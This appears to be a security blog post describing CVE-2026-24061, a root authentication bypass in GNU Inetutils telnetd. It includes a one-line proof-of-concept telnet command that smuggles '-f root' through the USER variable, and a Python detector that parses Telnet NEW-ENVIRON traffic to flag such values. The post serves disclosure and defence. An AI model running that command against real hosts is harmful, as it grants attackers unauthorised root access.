JAN 25, 2026 • CVE
The Ghost of the 90s: GNU InetUtils Telnetd Auth Bypass (CVE-2026-24061)
A critical vulnerability has been discovered in GNU Inetutils telnetd (versions 1.9.3 - 2.7) that allows unauthenticated remote attackers to gain root privileges.
The Susceptibility
This vulnerability (CVE-2026-24061) is an authentication bypass caused by improper handling of user-supplied environment variables. It has existed in the codebase for over a decade (since 2015) but was only recently disclosed.
Exploit Mechanics
The vulnerability is trivial to exploit. An attacker simply needs to supply a malicious USER environment variable during the initial handshake.
# Example Proof-of-Concept
telnet -l "-f root" <target-ip>
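For defenders, a detection sketch follows (an added example, not part of the original post or of the Inetutils code). It assumes the USER variable reaches the server in the Telnet NEW-ENVIRON option (RFC 1572) and flags any USER value that begins with "-", as the "-f root" value above does; the function names and byte captures are constructed for illustration.

```python
# Added example. Byte values are from RFC 1572 (Telnet NEW-ENVIRON option).
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39
IS, INFO, VAR, VALUE, ESC, USERVAR = 0, 2, 0, 1, 2, 3

def subnegotiations(stream):
    """Yield (option, payload) for each complete IAC SB <opt> ... IAC SE."""
    i = 0
    while i + 2 < len(stream):
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] != SB:
            i += 2  # other command, or IAC IAC (escaped 0xFF data byte)
        else:
            opt, j, payload = stream[i + 2], i + 3, bytearray()
            while j + 1 < len(stream):
                if stream[j] == IAC and stream[j + 1] == SE:
                    yield opt, bytes(payload)
                    break
                if stream[j] == IAC and stream[j + 1] == IAC:
                    j += 1  # IAC IAC inside SB is one literal 0xFF
                payload.append(stream[j])
                j += 1
            i = j + 2

def parse_environ(payload):
    """Decode an IS/INFO payload into {name: value}; ESC quotes one byte."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    parts, env, it = [], {}, iter(payload[1:])
    for b in it:
        if b in (VAR, VALUE, USERVAR):
            parts.append([b, bytearray()])
        elif parts:
            parts[-1][1].append(next(it, b) if b == ESC else b)
    for (kind, data), (nkind, ndata) in zip(parts, parts[1:] + [[VAR, b""]]):
        if kind != VALUE:
            val = ndata if nkind == VALUE else b""
            env[data.decode("latin-1")] = val.decode("latin-1")
    return env

def suspicious_user(stream):
    """Return USER values that a command line would read as an option."""
    users = (parse_environ(p).get("USER")
             for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON)
    return [u for u in users if u is not None and u.lstrip().startswith("-")]

# Constructed sample captures (client-to-server bytes), not real traffic.
_PRE = bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE])
BENIGN, FLAGGED = (_PRE + u + bytes([IAC, SE]) for u in (b"alice", b"-f root"))
```

Run suspicious_user over the client-to-server bytes of a captured session; a non-empty result is worth an alert on any host still exposing telnetd.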